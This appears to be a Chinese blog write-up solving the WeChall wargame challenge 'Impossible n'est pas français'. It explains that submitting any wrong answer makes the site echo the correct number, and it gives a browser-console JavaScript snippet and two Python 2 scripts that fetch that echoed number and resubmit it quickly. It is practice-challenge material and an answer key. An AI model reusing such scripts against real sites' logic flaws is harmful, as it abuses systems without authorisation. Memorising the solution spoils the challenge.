当前位置：首页 > news >正文

Impossible n‘est pas français (Exploit) 答案

news 来源：原创 2024/5/12 22:09:17

解决

直接说下做法。首先点击Click here to request a new number请求一个数，然后任意提交一个错误答案，系统会将正确答案返回给我们。

所以题目的关键就是快速将回显的答案提交过去。

JS

这是我自己写的js脚本。

text = document.getElementsByClassName("gwf_errors")[0].innerText
num = text.substr(40,text.length-41)
document.getElementsByTagName("tbody")[0].getElementsByTagName("input")[0].value = num
document.getElementsByTagName("tbody")[0].getElementsByTagName("input")[1].click()

首先f12打开开发者工具，切换到console面板，将上面代码粘贴上去，但是不要回车运行。

Impossible n'est pas français (Exploit) 答案

然后新标签打开请求新数链接，然后在answer输入框输入1并提交。

这时候页面会出现正确答案。快速回车运行上面代码，成功！

python2

下面有两段python2代码可以参考一下。

这段代码来自OtherFiles/WeChall.md at master · lc4t/OtherFiles

import re
import requests
from bs4 import BeautifulSoup
cookie = {
    'WC': '你的cookie'
}


def getNumber():
    url = 'http://www.wechall.net/challenge/impossible/index.php?request=new_number'
    result = requests.get(url, cookies=cookie)


def getAnswer():
    getNumber()
    url = 'http://www.wechall.net/challenge/impossible/index.php'
    data = {
        'solution': '123',
        'cmd': 'Send',
        'gwf3_csrf': 'EioRwZvt'
    }
    result = requests.post(url, cookies=cookie, data=data)
    text = BeautifulSoup(result.text).get_text()
    answer = re.compile(r'"(\d+)"').findall(text)[0]
    return answer


def send():
    url = 'http://www.wechall.net/challenge/impossible/index.php'
    data = {
        'solution': getAnswer(),
        'cmd': 'Send',
        'gwf3_csrf': 'EioRwZvt'
    }
    result = requests.post(url, cookies=cookie, data=data)
    print result.text
    # print 'Ok'


send()

下面这段来自WeChall Journal | 陈文青

#!/usr/bin/env python
# coding=utf-8

import lxml
import lxml.html as H
import requests

cookie = {
    'WC': '你的cookie'
}


def get_number():
    number_url = 'http://www.wechall.net/challenge/impossible/index.php?request=new_number'
    resp = requests.get(number_url, cookies=cookie)
    d = H.document_fromstring(resp.text)
    return str(d.xpath('//div[@id=\'page\']')[0].text_content()).strip()


print get_number()

def get_answer():
    post_data = {
        'solution': '1+12',
        'cmd': 'Send',
        'gwf3_csrf': '2XDoWTUR'
    }
    url = 'http://www.wechall.net/challenge/impossible/index.php' 
    resp = requests.post(url, cookies=cookie, data=post_data)
    # print resp.text
    d = H.document_fromstring(resp.text)
    import re
    ar = re.compile(r'"(\d+)"')
    text = d.xpath('//div[@class=\'gwf_errors\']/ul/li')[0].text_content()
    ans = ar.findall(text)[0]

    print ans 

    post_data = {
        'solution': ans,
        'cmd': 'Send',
        'gwf3_csrf': '2XDoWTUR'
    }

    resp = requests.post(url, cookies=cookie, data=post_data)
    print resp.text

get_answer()